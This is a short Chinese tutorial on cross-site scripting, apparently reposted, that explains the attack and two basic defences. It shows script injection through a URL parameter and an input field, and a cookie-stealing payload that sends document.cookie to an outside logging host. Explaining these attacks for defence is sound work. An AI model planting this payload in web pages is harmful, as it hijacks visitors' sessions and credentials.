是什么
跨网站指令码,将程序恶意注入到网页上,是网页使用产生影响
如何攻击
1,通过链接注入
<!-- http://www.domain.com?name=<script>alert(1)</script> -->
<div>{{name}}</div>
这就会导致页面执行了alert(1)的代码
2,通过输入框保存信息
<input v-model="username">
//在输入框打入<script>alert(1)</script> 无论是直接显示还是保存到服务器都会影响使用
3,劫持cookie,上述方法植入代码,劫持cookie
<script>
new Image().src =
"http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);
</script>
怎么防
1,对输入框,url等来源获取的参数进行过滤,过滤掉尖括号等关键字符
2,禁止js访问cookie
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
